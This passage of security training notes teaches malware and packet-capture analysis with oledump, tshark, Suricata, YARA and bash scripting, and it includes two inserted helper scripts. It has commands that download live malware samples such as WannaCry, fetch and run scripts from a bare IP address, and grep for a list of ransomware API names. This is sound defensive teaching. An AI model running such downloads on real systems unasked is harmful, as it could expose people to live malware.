  1240. yara -w rules/index.yar wannacry.exe
  1241.  
  1242.  
  1243. ----------------------------------------------------------------------
  1244.  
  1245.  
  1246. References:
  1247. https://www.slideshare.net/JohnLaycock1/yet-another-yara-allocution-yaya
  1248. https://www.slideshare.net/KasperskyLabGlobal/upping-the-apt-hunting-game-learn-the-best-yara-practices-from-kaspersky
  1249.  
  1250.  
  1251.  
  1252.  
  1253.  
  1254.  
  1255.  
  1256. #####################################################
  1257. # Analyzing Macro Embedded Malware #
  1258. #####################################################
  1259. ---------------------------Type This-----------------------------------
  1260. cd ~/students/yourname/security/malware_analysis
  1261.  
  1262. mkdir macro_docs
  1263.  
  1264. cd macro_docs
  1265.  
  1266. wget https://infosecaddicts-files.s3.amazonaws.com/064016.zip
  1267.  
  1268. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  1269.  
  1270. unzip oledump_V0_0_22.zip
  1271.  
  1272. unzip 064016.zip
  1273. infected      <---- type this when unzip prompts for the password
  1274.  
  1275. python oledump.py 064016.doc
  1276.  
  1277. python oledump.py 064016.doc -s A4 -v
  1278. -----------------------------------------------------------------------
  1279.  
  1280.  
  1281.  
  1282. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  1283. - Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'.
  1284.  
  1285. ---------------------------Type This-----------------------------------
  1286. python oledump.py 064016.doc -s A5 -v
  1287. -----------------------------------------------------------------------
  1288.  
  1289. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  1290.  
  1291. ---------------------------Type This-----------------------------------
  1292. python oledump.py 064016.doc -s A3 -v
  1293.  
  1294. - Look for "GVhkjbjv" and you should see:
  1295.  
  1297.  
  1298. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  1299. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
  1300. -----------------------------------------------------------------------
  1301.  
  1302.  
  1303.  
  1304.  
  1305. #########################################
  1306. # Security Operations Center Job Roles #
  1307. # Intrusion Analysis Level 1 #
  1308. #########################################
  1309. Required Technical Skills: Comfortable with basic Linux/Windows (MCSA/Linux+)
  1310. Comfortable with basic network (Network+)
  1311. Comfortable with security fundamentals (Security+)
  1312.  
  1313.  
  1314.  
  1315.  
  1316.  
  1317. Job Task: Process security events, follow incident response triage playbook
  1318.  
  1319. #########################################
  1320. # Security Operations Center Job Roles #
  1321. # Intrusion Analysis Level 2 #
  1322. #########################################
  1323.  
  1324. Required Technical Skills: Comfortable with basic Linux/Windows system administration
  1325. Comfortable with basic network administration
  1326. Comfortable with basic programming
  1327. Comfortable researching IT security issues
  1328.  
  1329.  
  1330.  
  1331.  
  1332.  
  1333. Job Task: Perform detailed malware analysis, assist with development of the incident response triage playbook
  1334.  
  1335. Sample Playbook: https://infosecaddicts-files.s3.amazonaws.com/IR-Program-and-Playbooks.zip
  1336.  
  1337.  
  1338.  
  1339. #########################################
  1340. # Security Operations Center Job Roles #
  1341. # Intrusion Analysis Level 3 #
  1342. #########################################
  1343.  
  1344. Required Technical Skills: Strong statistical analysis background
  1345. Strong programming background (C, C++, Java, Assembly, scripting languages)
  1346. Advanced system/network administration background
  1347. Comfortable researching IT security issues
  1348.  
  1349.  
  1350.  
  1351.  
  1352.  
  1353. Job Task: Perform detailed malware analysis
  1354. Perform detailed statistical analysis
  1355. Assist with development of the incident response triage playbook
  1356.  
  1357.  
  1358.  
  1359.  
  1360. #################################################
  1361. # Good references for learning Malware Analysis #
  1362. #################################################
  1363.  
  1364. References:
  1365. https://www.slideshare.net/SamBowne/cnit-126-ch-0-malware-analysis-primer-1-basic-static-techniques
  1366. https://www.slideshare.net/grecsl/malware-analysis-101-n00b-to-ninja-in-60-minutes-at-bsideslv-on-august-5-2014
  1367. https://www.slideshare.net/Bletchley131/intro-to-static-analysis
  1368.  
  1369.  
  1370.  
  1371. ##################
  1372. # Day 2 Homework #
  1373. ##################
  1374.  
  1375. Task Option 1: Basic Shell Scripting
  1376. ------------------------------------
  1377. Watch and do all of the exercises in the video https://www.youtube.com/watch?v=GtovwKDemnI
  1378. Create a word document that contains the screenshots of the tasks performed in this video
  1379. Name the word document 'YourFirstName-YourLastName-LinuxDay2-ShellScripting.docx' (ex: 'Joseph-McCray-LinuxDay2-ShellScripting.docx')
  1380. Email the document to me at joe-at-secureninja-dot-com before the start of class tomorrow
  1381.  
  1382.  
  1383. Task Option 2: Advanced Shell Scripting
  1384. ---------------------------------------
  1385. Watch and do all of the exercises in the video https://www.youtube.com/watch?v=aNQCl_ByM20&t=4045s
  1386. Create a word document that contains the screenshots of the tasks performed in this video
  1387. Name the word document 'YourFirstName-YourLastName-LinuxDay2-AdvancedShellScripting.docx' (ex: 'Joseph-McCray-LinuxDay2-AdvancedShellScripting.docx')
  1388. Email the document to me at joe-at-secureninja-dot-com before the start of class tomorrow
  1389.  
  1390.  
  1391.  
  1392.  
  1393.  
  1394.  
  1395.  
  1396.  
  1397.  
  1398.  
  1399.  
  1400.  
  1401.  
  1402. #####################################
  1403. ############################## # Day 3: Threat Hunting on the wire # ##############################
  1404. #####################################
  1405.  
  1406.  
  1407.  
  1408.  
  1409. - After logging in, please open a terminal window and type the following commands:
  1410. ---------------------------Type This-----------------------------------
  1411. cd ~/students/yourname/security/
  1412. mkdir pcap_analysis
  1413. cd pcap_analysis
  1414. -----------------------------------------------------------------------
  1415.  
  1416.  
  1417.  
  1418.  
  1419. ##################################################################
  1420. # Analyzing a PCAP with Prads #
  1421. # Note: run as regular user #
  1422. ##################################################################
  1423.  
  1424. ---------------------------Type this as a regular user----------------------------------
  1425. cd ~/students/yourname/security/pcap_analysis/
  1426.  
  1427. mkdir prads
  1428.  
  1429. cd prads
  1430.  
  1431. wget http://45.63.104.73/suspicious-time.pcap
  1432.  
  1433. prads -r suspicious-time.pcap -l prads-asset.log
  1434.  
  1435. cat prads-asset.log | less
  1436.  
  1437. cat prads-asset.log | grep SYN | grep -iE 'windows|linux'
  1438.  
  1439. cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'
  1440.  
  1441. cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
  1442. -----------------------------------------------------------------------
  1443.  
  1444.  
  1445.  
  1446.  
  1447. ##################################
  1448. # PCAP Analysis with ChaosReader #
  1449. # Note: run as regular user #
  1450. ##################################
  1451. ---------------------------Type this as a regular user----------------------------------
  1452. cd ~/students/yourname/security/pcap_analysis/
  1453.  
  1454. mkdir chaos_reader/
  1455.  
  1456. cd chaos_reader/
  1457.  
  1458. wget http://45.63.104.73/suspicious-time.pcap
  1459.  
  1460. wget http://45.63.104.73/chaosreader.pl
  1461.  
  1462. perl chaosreader.pl suspicious-time.pcap
  1463.  
  1464. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
  1465.  
  1466. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
  1467.  
  1468.  
  1469. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
  1470.  
  1471.  
  1472.  
  1473. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u | awk '{print $5}' > url.lst
  1474.  
  1475.  
  1476. wget https://raw.githubusercontent.com/Open-Sec/forensics-scripts/master/check-urls-virustotal.py
  1477.  
  1478.  
  1479. python check-urls-virustotal.py url.lst
  1480.  
  1481.  
  1482.  
  1483. ------------------------------------------------------------------------
  1484.  
  1485.  
  1486.  
  1487.  
  1488.  
  1489.  
  1490.  
  1491.  
  1492. #############################
  1493. # PCAP Analysis with tshark #
  1494. # Note: run as regular user #
  1495. #############################
  1496. ---------------------------Type this as a regular user---------------------------------
  1497. cd ~/students/yourname/security/pcap_analysis/
  1498.  
  1499. mkdir tshark
  1500.  
  1501. cd tshark/
  1502.  
  1503. wget http://45.63.104.73/suspicious-time.pcap
  1504.  
  1505. tshark -r suspicious-time.pcap -qz io,phs
  1506.  
  1507. tshark -r suspicious-time.pcap -qz ip_hosts,tree
  1508.  
  1509. tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
  1510.  
  1511. tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
  1512.  
  1513.  
  1514. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
  1515.  
  1516. whois rapidshare.com.eyu32.ru
  1517.  
  1518. whois sploitme.com.cn
  1519.  
  1520. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
  1521.  
  1522. tshark -r suspicious-time.pcap -qz http_req,tree
  1523.  
  1524. tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
  1525.  
  1526. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  1527. ------------------------------------------------------------------------
  1528.  
  1529.  
  1530.  
  1531.  
  1532.  
  1533. ###############################
  1534. # Extracting files from PCAPs #
  1535. # Note: run as regular user #
  1536. ###############################
  1537. ---------------------------Type this as a regular user---------------------------------
  1538. cd ~/students/yourname/security/pcap_analysis/
  1539.  
  1540. mkdir extract_files
  1541.  
  1542. cd extract_files
  1543.  
  1544. wget http://45.63.104.73/suspicious-time.pcap
  1545.  
  1546. foremost -v -i suspicious-time.pcap
  1547.  
  1548. cd output
  1549.  
  1550. ls
  1551.  
  1552. cat audit.txt
  1553.  
  1554. cd exe
  1555.  
  1556. wget https://raw.githubusercontent.com/GREEKYnikhilsharma/Xen0ph0n-VirusTotal_API_Tool-Python3/master/vtlite.py
  1557. ---------------------------------------------------------------------------------------
  1558.  
  1559.  
  1560. ******* NOTE: You will need to put your virustotal API key in vtlite.py *******
  1561. * Create an account in virustotal > login > click on your profile > API key > copy API key > in terminal do nano vtlite.py >
  1562. * Paste the API key in where it says > profit
  1563. ********************************************************************************
  1564.  
  1565. ---------------------------Type this as a regular user---------------------------------
  1566. for f in *.exe; do python3 vtlite.py -s $f; sleep 20; done
  1567. ---------------------------------------------------------------------------------------
  1568.  
  1569.  
  1570. ###############################
  1571. # PCAP Analysis with Suricata #
  1572. # Note: run as root #
  1573. ###############################
  1574. --------------------------Type this as root--------------------------------
  1575. cd ~/students/yourname/security/pcap_analysis/
  1576.  
  1577. mkdir suricata
  1578.  
  1579. cd suricata/
  1580.  
  1581. wget http://45.63.104.73/suspicious-time.pcap
  1582.  
  1583. mkdir suri
  1584.  
  1585. sudo suricata -c /etc/suricata/suricata.yaml -r suspicious-time.pcap -l suri/
  1586.  
  1587. cd suri/
  1588.  
  1589. cat stats.log | less
  1590.  
  1591. cat eve.json |grep -E "e\":\"http"|jq ".timestamp,.http"|csplit - /..T..:/ {*}
  1592.  
  1593. cat xx01
  1594.  
  1595. cat xx02
  1596.  
  1597. cat xx03
  1598.  
  1599. cat xx04
  1600.  
  1601. cat xx05
  1602.  
  1603. cat xx06
  1604. ------------------------------------------------------------------------
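Added example (not part of the course notes or of Suricata): a Python script that does what the grep / jq / csplit pipeline above does, pulling the http events out of eve.json, but keeps them as structured records you can filter and count. EVE_LINES are constructed records in eve.json's shape, not output from suspicious-time.pcap, and the hostnames are placeholders.

```python
"""Triage Suricata http events from eve.json.

Added example, not part of the course notes or of Suricata. EVE_LINES are
constructed records in eve.json's shape (one JSON object per line), not
output from the lab pcap; hostnames and IPs are placeholders.
"""
import json

EVE_LINES = [
    '{"timestamp":"2009-10-23T01:17:08.000000+0000","event_type":"flow",'
    '"src_ip":"10.0.3.15","dest_ip":"10.0.3.1","proto":"UDP"}',
    '{"timestamp":"2009-10-23T01:17:09.000000+0000","event_type":"http",'
    '"src_ip":"10.0.3.15","src_port":1038,"dest_ip":"192.0.2.10","dest_port":80,'
    '"proto":"TCP","tx_id":0,"http":{"hostname":"portal.example.test",'
    '"url":"/index.php","http_user_agent":"Mozilla/4.0 (compatible; MSIE 6.0)",'
    '"http_method":"GET","protocol":"HTTP/1.1","status":200,"length":512}}',
    '{"timestamp":"2009-10-23T01:17:11.000000+0000","event_type":"http",'
    '"src_ip":"10.0.3.15","src_port":1039,"dest_ip":"192.0.2.20","dest_port":80,'
    '"proto":"TCP","tx_id":0,"http":{"hostname":"cdn.example.test",'
    '"url":"/load.php?e=1","http_user_agent":"Mozilla/4.0 (compatible; MSIE 6.0)",'
    '"http_method":"GET","protocol":"HTTP/1.1","status":200,"length":20480}}',
    '{"timestamp":"2009-10-23T01:17:12.000000+0000","event_type":"alert",'
    '"src_ip":"192.0.2.20","dest_ip":"10.0.3.15","proto":"TCP",'
    '"alert":{"signature":"constructed test alert","severity":1}}',
    '{"timestamp":"2009-10-23T01:17:15.000000+0000","event_type":"http",'
    '"src_ip":"10.0.3.16","src_port":2001,"dest_ip":"192.0.2.10","dest_port":80,'
    '"proto":"TCP","tx_id":0,"http":{"hostname":"portal.example.test",'
    '"url":"/favicon.ico","http_method":"GET","protocol":"HTTP/1.1","status":404}}',
    # Constructed truncated last line: Suricata appends to eve.json while it
    # runs, so a partial record at the end is a normal condition to handle.
    '{"timestamp":"2009-10-23T01:17:16.000000+0000","event_type":"http","src_ip":"10.0.3.1',
]


def http_events(lines):
    """Yield (timestamp, src_ip, dest_ip, http dict) for each http event.

    Malformed lines are skipped instead of aborting the whole run.
    """
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if rec.get("event_type") != "http":
            continue
        yield rec["timestamp"], rec["src_ip"], rec["dest_ip"], rec.get("http", {})


def request_lines(lines):
    """One line per request in the 'src -> dst : http://host/url' shape the
    tshark/awk one-liner earlier in the notes prints, plus the status code."""
    out = []
    for ts, src, dst, h in http_events(lines):
        url = "http://%s%s" % (h.get("hostname", ""), h.get("url", ""))
        out.append("%s %s -> %s : %s [%s]" % (ts, src, dst, url, h.get("status", "-")))
    return out


def hosts_by_client(lines):
    """Map each client IP to the sorted list of hostnames it requested."""
    table = {}
    for _, src, _, h in http_events(lines):
        table.setdefault(src, set()).add(h.get("hostname", ""))
    return {src: sorted(hosts) for src, hosts in table.items()}


def user_agents(lines):
    """Distinct User-Agent strings per client (the tshark http.user_agent
    query from earlier, but per client rather than per request)."""
    table = {}
    for _, src, _, h in http_events(lines):
        ua = h.get("http_user_agent")
        if ua:
            table.setdefault(src, set()).add(ua)
    return {src: sorted(uas) for src, uas in table.items()}


if __name__ == "__main__":
    import sys
    # Give it the path to a real eve.json (e.g. suri/eve.json) to use that
    # instead of the constructed records.
    lines = open(sys.argv[1]).read().splitlines() if len(sys.argv) > 1 else EVE_LINES
    for entry in request_lines(lines):
        print(entry)
    print(hosts_by_client(lines))
    print(user_agents(lines))
```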
  1605.  
  1606.  
  1607. #############################
  1608. # PCAP Analysis with Yara #
  1609. # Note: run as regular user #
  1610. #############################
  1611. -------------------------Type this as a regular user----------------------------------
  1612. cd ~/students/yourname/security/pcap_analysis/
  1613.  
  1614. git clone https://github.com/kevthehermit/YaraPcap.git
  1615. cd YaraPcap/
  1616. wget http://45.63.104.73/suspicious-time.pcap
  1617. wget https://github.com/Yara-Rules/rules/archive/master.zip
  1618. unzip master.zip
  1619. cd rules-master/
  1620. ls
  1621. cat index.yar
  1622. clear
  1623. ./index_gen.sh
  1624. cd ..
  1625. mkdir matching_files/
  1626. python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/
  1627. whereis tcpflow
  1628. vi yaraPcap.py **** fix line 35 with correct path to tcpflow (/usr/bin/tcpflow)****
  1629. python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/
  1630. cd matching_files/
  1631. ls
  1632. cat report.txt
  1633. ------------------------------------------------------------------------
  1634.  
  1635.  
  1636.  
  1637.  
  1638. #################################################################################
  1639. # Now that you know packet analysis here are the next set of files to play with #
  1640. #################################################################################
  1641. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/APT41/APT41_StoreSyncSvc.pcap
  1642. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/Agent_Tesla/agenttesla_09July2019.pcap
  1643. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/CVE-2019-9978/CVE-2019-9978_attempt_05May2019.pcap
  1644. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/Powershell/Powershell_script_19Dec2019.pcap
  1645. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/sharik_smoke/sharik_smoke.pcap
  1646. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/Microsoft/CVE-2019-0703.pcap
  1647. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/Microsoft/CVE-2019-0801.pcap
  1648.  
  1649.  
  1650.  
  1651. References:
  1652. https://www.slideshare.net/j0b1n/tcpdump-hunter
  1653. https://www.slideshare.net/AviNetworks/reconsider-tcpdump-for-modern-troubleshooting
  1654.  
  1655.  
  1656. ##################
  1657. # Day 3 Homework #
  1658. ##################
  1659.  
  1660. Task Option 1: Shell Scripting
  1661. ------------------------------------
  1662. Watch and do all of the exercises in the video https://www.youtube.com/watch?v=hwrnmQumtPw
  1663. Create a word document that contains the screenshots of the tasks performed in this video
  1664. Name the word document 'YourFirstName-YourLastName-LinuxDay3-ShellScripting.docx' (ex: 'Joseph-McCray-LinuxDay3-ShellScripting.docx')
  1665. Email the document to me at joe-at-secureninja-dot-com before the start of class tomorrow
  1666.  
  1667.  
  1668. Task Option 2: Python3
  1669. ---------------------------------------
  1670. Watch and do all of the exercises in the first 7 videos from https://www.youtube.com/playlist?list=PLypxmOPCOkHVzhKRcWzEkQXCnmHezGVeB
  1671. Create a word document that contains the screenshots of the tasks performed in these videos
  1672. Name the word document 'YourFirstName-YourLastName-LinuxDay3-AdvancedShellScripting.docx' (ex: 'Joseph-McCray-LinuxDay3-AdvancedShellScripting.docx')
  1673. Email the document to me at joe-at-secureninja-dot-com before the start of class tomorrow
  1674.  
  1675.  
  1676.  
  1677.  
  1678.  
  1679.  
  1680.  
  1681.  
  1682.  
  1683.  
  1684.  
  1685.  
  1686. ################################################################
  1687. ############################## # Day 4: Programming Fundamentals & Offensive Cyber Operations # ##############################
  1688. ################################################################
  1689.  
  1690. ------------------------------- Programming fundamentals -------------------------------
  1691.  
  1692.  
  1693. Joe rule #1 single quote, single quote, left arrow
  1694. --------------------------------------------------
  1695. '' <-- as soon as you type '', then hit your left arrow key to put you inside of the ''
  1696. "" <-- as soon as you type "", then hit your left arrow key to put you inside of the ""
  1697. something() <-- as soon as you type (), then hit your left arrow key to put you inside of the ()
  1698. something[] <-- as soon as you type [], then hit your left arrow key to put you inside of the []
  1699. something{} <-- as soon as you type {}, then hit your left arrow key to put you inside of the {}
  1700.  
  1701. -- Now kick it up a notch
  1702. [] <-- as soon as you type [], then hit your left arrow key to put you inside of the []
  1703. [()] <-- as soon as you type (), then hit your left arrow key to put you inside of the ()
  1704. [({})] <-- as soon as you type {}, then hit your left arrow key to put you inside of the {}
  1705. [({"''"})] <-- as soon as you type "", then hit your left arrow key to put you inside of the ""
  1706. [({"''"})] <-- as soon as you type '', then hit your left arrow key to put you inside of the ''
  1707.  
  1708.  
  1709.  
  1710. Joe rule #2 "Code can only do 3 things"
  1711. --------------------------------------
  1712.  
  1713. Process - read, write, math
  1714.  
  1715. Decision - if/then
  1716.  
  1717. Loop - for
  1718.  
  1719.  
  1720.  
  1721.  
  1722. Joe rule #3 "Never more than 5-10"
  1723. ---------------------------------
  1724.  
  1725. -----5 lines of code----
  1726. line 1 blah blah blah
  1727. line 2 blah blah blah
  1728. line 3 blah blah blah
  1729. line 4 blah blah blah
  1730. line 5 blah blah blah
  1731.  
  1732.  
  1733. sales_tax = price * tax_rate
  1734.  
  1735.  
  1736. 0.80 = 10 * 0.08
  1737.  
  1738. -----5-10 lines of code---- = function
  1739. price = 10
  1740.  
  1741. def st(price):
  1742.     sales_tax = price * 0.08
  1743.     print(sales_tax)
  1744.  
  1745.  
  1746. st(10) <---- how to run a function (the value in the () is passed in as 'price')
  1747.  
  1748. -----5-10 functions ---- = class "tax class"
  1749. st()
  1750. lt()
  1751. pt()
  1752. it()
  1753. dt()
  1754.  
  1755.  
  1756.  
  1757. tax.st()
  1758. tax.lt()
  1759.  
  1760. -----5-10 functions ---- = class "expense class"
  1761. gas()
  1762. elec()
  1763. water()
  1764. food()
  1765. beer()
  1766.  
  1767. expense.gas()
  1768.  
  1769.  
  1770. -----5-10 classes ---- = module "finance module"
  1771.  
  1772. import finance
  1773.  
  1774.  
  1775. ------------------------------- Summary of fundamentals ------------------------------
  1776.  
  1777.  
  1778.  
  1779.  
  1780.  
  1781.  
  1782.  
  1783.  
  1784.  
  1785.  
  1786.  
  1787.  
  1788.  
  1789.  
  1790.  
  1791. Let's look at a simple for loop
  1792. ---------------------------Type This-----------------------------------
  1793. cd ~/students/yourname/
  1794. mkdir programming_fundamentals
  1795. cd programming_fundamentals
  1796. cp ~/wannacry.exe .
  1797. nano forloop_malware_analysis.sh
  1798.  
  1799. ---------------------------Paste This-----------------------------------
  1800. #!/bin/bash
  1801.  
  1802. # One imported API name per array element. Quote the array when you expand it
  1803. # so multi-word elements are never split into separate words.
  1804. ransomware=('CryptImportKey' 'CryptDecrypt' 'CryptDestroyKey' 'CryptReleaseContext' 'EntryPoint' 'CryptAcquireContextA' 'lstrcpyW' 'lstrlenW' 'lstrcatW' 'CloseHandle' 'lstrcmpiA' 'RegOpenKeyExA' 'lstrlenA' 'RegSetValueExA' 'RegCloseKey' 'RegQueryValueExA' 'GetLastError' 'GetEnvironmentVariableA' 'ShellExecuteA' 'Sleep' 'CryptGenKey' 'CryptExportKey' 'CryptEncrypt' 'KiUserExceptionDispatcher' 'RtlZeroMemory' 'MultiByteToWideChar' 'lstrcatA' 'RegCreateKeyA' 'SHChangeNotify' 'SetErrorMode' 'CryptGenKey' 'CryptImportKey')
  1805.  
  1806. # This is just a test to read all of the values in the array
  1807. #echo "${ransomware[@]}"
  1808.  
  1809. # This is a quick for loop to run strings and grep for everything in the array
  1810. # Reference: http://www.masteringunixshell.net/qa3/bash-how-to-echo-array.html
  1811.  
  1812. for ELEMENT in "${ransomware[@]}"
  1813. do
  1814.     #echo string: "$ELEMENT"
  1815.     strings wannacry.exe | grep -i "$ELEMENT"
  1816. done
  1816. --------------------------------------------------
  1817.  
  1818.  
  1819.  
  1820.  
  1821.  
  1822.  
  1823.  
  1824.  
  1825. Ok, now let's run it
  1826. ---------------------------Type This-----------------------------------
  1827. chmod +x forloop_malware_analysis.sh
  1828. ./forloop_malware_analysis.sh
  1829. ------------------------------------------------------------------------
  1830.  
  1831.  
  1832.  
  1833.  
  1834.  
  1835.  
  1836. Let's look at a simple menu
  1837. ---------------------------Type This-----------------------------------
  1838.  
  1839. nano simple_menu.sh
  1840.  
  1841. ---------------------------Paste This-----------------------------------
  1842. #!/bin/bash
  1843. # simple menu to do various functions
  1844. # Reference: http://www.seafriends.org.nz/linux/menus.htm
  1845.  
  1846. # The loop test must expand and quote the variable: a bare 'answer' is a
  1847. # literal string that is never equal to "0", so the test would never end the loop.
  1848. answer=""
  1849. while [ "$answer" != "0" ]
  1850. do
  1851.     clear
  1852.     echo "Select from the following functions"
  1853.     echo " 0 exit"
  1854.     echo " 1 Network Asset Inventory"
  1855.     echo " 2 IP to IP communication and URL lookup"
  1856.     echo " 3 Extract files"
  1857.     echo " 4 exit"
  1858.  
  1859.     read -p " ?" answer
  1860.     case "$answer" in
  1861.         0) break ;;
  1862.         1) echo "Network Asset Inventory"
  1863.            prads -r suspicious-time.pcap -l prads-asset.log
  1864.            cat prads-asset.log | grep SYN | grep -iE 'windows|linux'
  1865.            cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'
  1866.            cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
  1867.            ;;
  1868.         2) echo "IP to IP communication and URL lookup"
  1869.            tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  1870.            ;;
  1871.         3) echo "Extract files"
  1872.            foremost -v -i suspicious-time.pcap
  1873.            cat output/audit.txt
  1874.            ;;
  1875.         4) break ;;
  1876.         *) break ;;
  1877.     esac
  1878.     echo "press RETURN for menu"
  1879.     read -r key
  1880. done
  1881. exit 0
  1881. --------------------------------------------------
  1882.  
  1883.  
  1884.  
  1885.  
  1886.  
  1887.  
  1888.  
  1889.  
  1890. Ok, now let's run it
  1891. ---------------------------Type This-----------------------------------
  1892. chmod +x simple_menu.sh
  1893. ./simple_menu.sh
  1894. ------------------------------------------------------------------------
  1895.  
  1896.  
  1897.  
  1898.  
  1899.  
  1900.  
Let's look at a simple function
---------------------------Type This-----------------------------------

nano hello_world.sh

---------------------------Paste This-----------------------------------
#!/bin/bash
# Reference: https://linuxize.com/post/bash-functions/

# define the function (nothing runs yet) ...
hello_world () {
echo 'hello, world'
}

# ... then call it by name; the definition has to come before the call
hello_world
--------------------------------------------------



Ok, now let's run it
---------------------------Type This-----------------------------------
chmod +x hello_world.sh
./hello_world.sh
------------------------------------------------------------------------



Let's ask the user a question
---------------------------Type This-----------------------------------

nano prompt_for_user_input.sh

---------------------------Paste This-----------------------------------
#!/bin/bash
# Reference: https://tecadmin.net/prompt-user-input-in-linux-shell-script/

# -p prints the prompt, -r keeps backslashes in the input literal
read -r -p "Enter Your Name: " username
echo "Welcome $username!"
------------------------------------------------------------------------



Ok, now let's run it
---------------------------Type This-----------------------------------
chmod +x prompt_for_user_input.sh
./prompt_for_user_input.sh
------------------------------------------------------------------------



Let's make the function do something useful
---------------------------Type This-----------------------------------

nano ip_2_url_lookup.sh

---------------------------Paste This-----------------------------------
#!/bin/bash
# Reference: https://linuxize.com/post/bash-functions/

# list the HTTP requests made by 10.0.3.15 as "src -> dst : URL",
# skipping images/css/icons and shortening query strings to "?..."
do_stuff () {
tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
}

do_stuff
------------------------------------------------------------------------



Ok, now let's run it
---------------------------Type This-----------------------------------
chmod +x ip_2_url_lookup.sh
./ip_2_url_lookup.sh
------------------------------------------------------------------------
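The pipeline in ip_2_url_lookup.sh can only be exercised with tshark installed and a pcap on disk, so its awk/grep/sed stage is hard to check on its own. Below is an added example, not code from the course notes, that splits that stage into a function reading tshark's tab-separated `-T fields` output from stdin, with a constructed sample so it runs without a capture; `lookup_pcap` is the wrapper that runs the real tshark query. The field order, the function names and the sample hosts and addresses are assumptions for the example. One practical difference from the one-liner on the page: splitting on tabs keeps the columns aligned when http.host is empty for a request, where whitespace splitting would shift the URI into the host column.

```bash
#!/bin/bash
# Added example, not code from the course notes. It splits the awk/grep/sed
# stage of ip_2_url_lookup.sh into a function that reads tshark's tab-separated
# "-T fields" output from stdin, so the formatting can be checked on a
# constructed sample without tshark or a capture file.
# Assumed field order (the -e options used on the page, in that order):
#   ip.src <TAB> ip.dst <TAB> http.host <TAB> http.request.uri

# format_http_requests CLIENT_IP
#   Keeps requests sent by CLIENT_IP, drops image/css/ico noise, and replaces
#   the query string with "?..." so long tracking URLs do not swamp the list.
format_http_requests() {
    awk -F'\t' -v client="$1" '
        $1 == client && index($4, "/image") == 0 && $4 !~ /\.css/ && $4 !~ /\.ico/ {
            url = "http://" $3 $4
            sub(/\?.*$/, "?...", url)
            print $1 " -> " $2 "\t: " url
        }'
}

# lookup_pcap PCAP CLIENT_IP
#   The real query: tshark prints the four fields, the function formats them.
lookup_pcap() {
    tshark -r "$1" -Y http.request -T fields \
        -e ip.src -e ip.dst -e http.host -e http.request.uri \
        | format_http_requests "$2"
}

# Constructed sample of tshark's output (made-up hosts and addresses, not
# data from suspicious-time.pcap).
sample_requests() {
    printf '10.0.3.15\t10.0.2.2\texample.test\t/index.html\n'
    printf '10.0.3.15\t10.0.2.2\texample.test\t/image/logo.png\n'
    printf '10.0.3.15\t10.0.2.2\texample.test\t/style.css\n'
    printf '10.0.3.15\t10.0.2.2\tads.test\t/track?id=1234567890\n'
    printf '10.0.3.99\t10.0.2.2\tother.test\t/not-our-client\n'
}

# Usage: ./http_lookup.sh suspicious-time.pcap 10.0.3.15
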